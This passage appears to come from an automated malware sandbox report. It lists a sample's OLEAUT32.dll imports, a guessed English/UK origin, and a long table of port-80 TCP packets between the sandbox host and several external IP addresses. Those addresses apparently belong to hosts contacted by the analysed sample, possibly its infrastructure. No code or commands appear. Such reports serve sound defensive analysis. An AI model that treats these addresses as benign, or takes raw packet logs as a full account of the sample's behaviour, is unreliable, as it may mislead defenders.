OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 09:22:01.010154009 CET	49708	80	192.168.2.8	165.154.96.210
Jan 11, 2025 09:22:01.015013933 CET	80	49708	165.154.96.210	192.168.2.8
Jan 11, 2025 09:22:01.015151024 CET	49708	80	192.168.2.8	165.154.96.210
Jan 11, 2025 09:22:01.025820971 CET	49708	80	192.168.2.8	165.154.96.210
Jan 11, 2025 09:22:01.030666113 CET	80	49708	165.154.96.210	192.168.2.8
Jan 11, 2025 09:22:01.936825037 CET	80	49708	165.154.96.210	192.168.2.8
Jan 11, 2025 09:22:01.937124014 CET	80	49708	165.154.96.210	192.168.2.8
Jan 11, 2025 09:22:01.937246084 CET	49708	80	192.168.2.8	165.154.96.210
Jan 11, 2025 09:22:01.963982105 CET	49708	80	192.168.2.8	165.154.96.210
Jan 11, 2025 09:22:01.968789101 CET	80	49708	165.154.96.210	192.168.2.8
Jan 11, 2025 09:22:17.023291111 CET	49710	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:17.028218031 CET	80	49710	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:17.028701067 CET	49710	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:17.043891907 CET	49710	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:17.048784971 CET	80	49710	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:17.552941084 CET	80	49710	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:17.552983046 CET	80	49710	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:17.553037882 CET	49710	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:17.553210974 CET	80	49710	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:17.553339958 CET	80	49710	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:17.553394079 CET	49710	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:18.548258066 CET	49710	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:19.567476988 CET	49711	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:19.572374105 CET	80	49711	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:19.572540998 CET	49711	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:19.588128090 CET	49711	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:19.593029022 CET	80	49711	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:20.100411892 CET	80	49711	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:20.100430012 CET	80	49711	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:20.100493908 CET	49711	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:20.100517035 CET	80	49711	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:20.100567102 CET	49711	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:21.095427990 CET	49711	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:22.113962889 CET	49712	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:22.118858099 CET	80	49712	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:22.119035006 CET	49712	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:22.147507906 CET	49712	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:22.152401924 CET	80	49712	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:22.152518034 CET	80	49712	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:22.641765118 CET	80	49712	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:22.641815901 CET	80	49712	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:22.641855001 CET	80	49712	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:22.641892910 CET	49712	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:22.641922951 CET	49712	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:23.657449007 CET	49712	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:24.677313089 CET	49713	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:24.682178020 CET	80	49713	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:24.682322025 CET	49713	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:24.691960096 CET	49713	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:24.696851969 CET	80	49713	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:25.202689886 CET	80	49713	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:25.202733994 CET	80	49713	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:25.202748060 CET	80	49713	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:25.202764034 CET	80	49713	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:25.202987909 CET	80	49713	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:25.203125000 CET	49713	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:25.203166962 CET	49713	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:25.208151102 CET	49713	80	192.168.2.8	104.21.32.1
Jan 11, 2025 09:22:25.212959051 CET	80	49713	104.21.32.1	192.168.2.8
Jan 11, 2025 09:22:30.987387896 CET	49714	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:30.992270947 CET	80	49714	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:30.992348909 CET	49714	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:31.007671118 CET	49714	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:31.012448072 CET	80	49714	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:31.886207104 CET	80	49714	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:31.886228085 CET	80	49714	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:31.886286974 CET	49714	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:32.517129898 CET	49714	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:33.536207914 CET	49715	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:33.541199923 CET	80	49715	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:33.541340113 CET	49715	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:33.556636095 CET	49715	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:33.561526060 CET	80	49715	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:34.465711117 CET	80	49715	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:34.465738058 CET	80	49715	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:34.465811968 CET	49715	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:35.063829899 CET	49715	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:36.082978964 CET	49716	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:36.087930918 CET	80	49716	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:36.088090897 CET	49716	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:36.107708931 CET	49716	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:36.112581015 CET	80	49716	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:36.112689972 CET	80	49716	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:36.990885019 CET	80	49716	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:36.991002083 CET	80	49716	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:36.991059065 CET	49716	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:37.610665083 CET	49716	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:38.629530907 CET	49718	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:38.634432077 CET	80	49718	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:38.634538889 CET	49718	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:38.644262075 CET	49718	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:38.649142981 CET	80	49718	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:39.546056986 CET	80	49718	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:39.546124935 CET	80	49718	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:39.546242952 CET	49718	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:39.557327986 CET	49718	80	192.168.2.8	172.96.191.238
Jan 11, 2025 09:22:39.562247992 CET	80	49718	172.96.191.238	192.168.2.8
Jan 11, 2025 09:22:44.591758013 CET	49760	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:44.596756935 CET	80	49760	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:44.596832991 CET	49760	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:44.612538099 CET	49760	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:44.617444038 CET	80	49760	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:45.440356016 CET	80	49760	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:45.440414906 CET	80	49760	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:45.440485001 CET	49760	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:46.126327991 CET	49760	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:47.145234108 CET	49776	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:47.150126934 CET	80	49776	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:47.150243044 CET	49776	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:47.165770054 CET	49776	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:47.170713902 CET	80	49776	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:47.955934048 CET	80	49776	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:47.955996037 CET	80	49776	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:47.956156969 CET	49776	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:48.673249006 CET	49776	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:49.692100048 CET	49794	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:49.698331118 CET	80	49794	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:49.698502064 CET	49794	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:49.713234901 CET	49794	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:49.721486092 CET	80	49794	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:49.721894979 CET	80	49794	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:50.525701046 CET	80	49794	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:50.525748968 CET	80	49794	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:50.525801897 CET	49794	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:51.219979048 CET	49794	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:52.239018917 CET	49813	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:52.244040012 CET	80	49813	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:52.244144917 CET	49813	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:52.253429890 CET	49813	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:52.258322954 CET	80	49813	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:53.058301926 CET	80	49813	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:53.058341980 CET	80	49813	46.253.5.221	192.168.2.8
Jan 11, 2025 09:22:53.058495998 CET	49813	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:53.061530113 CET	49813	80	192.168.2.8	46.253.5.221
Jan 11, 2025 09:22:53.066297054 CET	80	49813	46.253.5.221	192.168.2.8
Jan 11, 2025 09:23:06.165185928 CET	49904	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:06.170052052 CET	80	49904	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:06.170125961 CET	49904	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:06.224632978 CET	49904	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:06.229521990 CET	80	49904	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:06.764780045 CET	80	49904	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:06.764899015 CET	80	49904	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:06.764991999 CET	49904	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:07.735676050 CET	49904	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:08.754700899 CET	49920	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:08.759517908 CET	80	49920	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:08.762402058 CET	49920	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:08.777729034 CET	49920	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:08.782644987 CET	80	49920	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:09.362889051 CET	80	49920	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:09.363015890 CET	80	49920	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:09.363126040 CET	49920	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:10.282541037 CET	49920	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:11.301835060 CET	49941	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:11.306802034 CET	80	49941	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:11.306937933 CET	49941	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:11.322449923 CET	49941	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:11.327370882 CET	80	49941	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:11.327406883 CET	80	49941	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:11.904377937 CET	80	49941	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:11.904566050 CET	80	49941	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:11.904633999 CET	49941	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:12.829648972 CET	49941	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:13.849265099 CET	49957	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:13.854293108 CET	80	49957	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:13.854476929 CET	49957	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:13.874752045 CET	49957	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:13.879662037 CET	80	49957	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:14.440572977 CET	80	49957	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:14.440741062 CET	80	49957	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:14.440789938 CET	49957	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:14.443732023 CET	49957	80	192.168.2.8	209.74.77.109
Jan 11, 2025 09:23:14.448507071 CET	80	49957	209.74.77.109	192.168.2.8
Jan 11, 2025 09:23:19.543566942 CET	49992	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:19.548413038 CET	80	49992	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:19.548490047 CET	49992	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:19.564755917 CET	49992	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:19.569778919 CET	80	49992	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:20.012846947 CET	80	49992	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:20.012866974 CET	80	49992	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:20.012881994 CET	80	49992	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:20.012911081 CET	49992	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:20.012943029 CET	49992	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:21.079545975 CET	49992	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:22.116525888 CET	49995	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:22.121634960 CET	80	49995	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:22.121814013 CET	49995	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:22.142438889 CET	49995	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:22.148654938 CET	80	49995	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:22.576590061 CET	80	49995	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:22.576646090 CET	80	49995	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:22.576692104 CET	49995	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:22.576711893 CET	80	49995	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:22.576755047 CET	49995	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:23.657588959 CET	49995	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:24.831011057 CET	49996	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:24.836121082 CET	80	49996	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:24.836204052 CET	49996	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:24.850862980 CET	49996	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:24.855735064 CET	80	49996	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:24.855928898 CET	80	49996	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:25.312596083 CET	80	49996	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:25.312644958 CET	80	49996	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:25.312680006 CET	80	49996	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:25.312843084 CET	49996	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:26.360850096 CET	49996	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:27.382841110 CET	49997	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:27.387891054 CET	80	49997	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:27.387975931 CET	49997	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:27.424400091 CET	49997	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:27.429301977 CET	80	49997	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:27.860451937 CET	80	49997	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:27.860502958 CET	80	49997	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:27.860543013 CET	80	49997	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:27.860851049 CET	49997	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:27.863872051 CET	49997	80	192.168.2.8	199.59.243.228
Jan 11, 2025 09:23:27.868684053 CET	80	49997	199.59.243.228	192.168.2.8
Jan 11, 2025 09:23:33.261315107 CET	49998	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:33.266278028 CET	80	49998	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:33.266381979 CET	49998	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:33.281068087 CET	49998	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:33.293761969 CET	80	49998	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:34.190567017 CET	80	49998	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:34.190598965 CET	80	49998	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:34.190685034 CET	49998	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:34.782679081 CET	49998	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:35.801306009 CET	49999	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:35.806335926 CET	80	49999	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:35.806440115 CET	49999	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:35.821805000 CET	49999	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:35.826750040 CET	80	49999	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:36.703248978 CET	80	49999	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:36.703310966 CET	80	49999	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:36.703396082 CET	49999	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:37.329468012 CET	49999	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:38.358223915 CET	50000	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:38.363291025 CET	80	50000	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:38.363797903 CET	50000	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:38.379188061 CET	50000	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:38.384157896 CET	80	50000	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:38.384233952 CET	80	50000	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:39.267107964 CET	80	50000	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:39.267134905 CET	80	50000	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:39.270332098 CET	50000	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:39.892040968 CET	50000	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:40.911338091 CET	50001	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:40.916359901 CET	80	50001	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:40.916479111 CET	50001	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:40.926628113 CET	50001	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:40.931484938 CET	80	50001	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:41.827436924 CET	80	50001	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:41.827527046 CET	80	50001	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:41.827742100 CET	50001	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:41.830699921 CET	50001	80	192.168.2.8	103.21.221.4
Jan 11, 2025 09:23:41.835513115 CET	80	50001	103.21.221.4	192.168.2.8
Jan 11, 2025 09:23:47.286334991 CET	50002	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:47.291253090 CET	80	50002	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:47.291461945 CET	50002	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:47.307190895 CET	50002	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:47.312218904 CET	80	50002	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:48.178983927 CET	80	50002	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:48.179050922 CET	80	50002	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:48.179172039 CET	50002	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:48.813901901 CET	50002	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:49.832992077 CET	50003	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:49.837946892 CET	80	50003	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:49.838087082 CET	50003	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:49.853689909 CET	50003	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:49.858591080 CET	80	50003	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:50.709671974 CET	80	50003	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:50.709703922 CET	80	50003	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:50.709865093 CET	50003	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:51.363771915 CET	50003	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:52.584916115 CET	50004	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:52.589976072 CET	80	50004	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:52.590064049 CET	50004	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:52.676466942 CET	50004	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:52.681560040 CET	80	50004	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:52.681626081 CET	80	50004	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:53.486032963 CET	80	50004	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:53.486053944 CET	80	50004	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:53.486191988 CET	50004	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:54.188939095 CET	50004	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:55.334043980 CET	50005	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:55.338963032 CET	80	50005	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:55.339050055 CET	50005	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:55.375621080 CET	50005	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:55.380450010 CET	80	50005	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:56.216105938 CET	80	50005	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:56.216212034 CET	80	50005	154.12.28.184	192.168.2.8
Jan 11, 2025 09:23:56.216386080 CET	50005	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:56.219394922 CET	50005	80	192.168.2.8	154.12.28.184
Jan 11, 2025 09:23:56.224169016 CET	80	50005	154.12.28.184	192.168.2.8
Jan 11, 2025 09:24:01.348223925 CET	50006	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:01.353173018 CET	80	50006	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:01.353240967 CET	50006	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:01.369858980 CET	50006	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:01.374722004 CET	80	50006	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:01.976176023 CET	80	50006	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:01.976435900 CET	80	50006	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:01.976511002 CET	50006	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:02.876434088 CET	50006	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:03.895565987 CET	50007	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:03.900507927 CET	80	50007	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:03.900643110 CET	50007	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:03.921864033 CET	50007	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:03.926812887 CET	80	50007	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:04.504182100 CET	80	50007	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:04.504967928 CET	80	50007	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:04.505165100 CET	50007	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:05.423613071 CET	50007	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:06.441519976 CET	50008	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:06.446439981 CET	80	50008	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:06.446564913 CET	50008	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:06.461751938 CET	50008	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:06.466583967 CET	80	50008	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:06.466766119 CET	80	50008	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:07.110616922 CET	80	50008	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:07.111099005 CET	80	50008	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:07.111167908 CET	50008	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:07.970290899 CET	50008	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:08.989195108 CET	50009	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:08.994158030 CET	80	50009	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:08.994277954 CET	50009	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:09.004293919 CET	50009	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:09.009056091 CET	80	50009	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:09.626426935 CET	80	50009	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:09.626679897 CET	80	50009	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:09.626756907 CET	50009	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:09.629380941 CET	50009	80	192.168.2.8	104.21.38.192
Jan 11, 2025 09:24:09.634234905 CET	80	50009	104.21.38.192	192.168.2.8
Jan 11, 2025 09:24:22.890019894 CET	50010	80	192.168.2.8	85.159.66.93
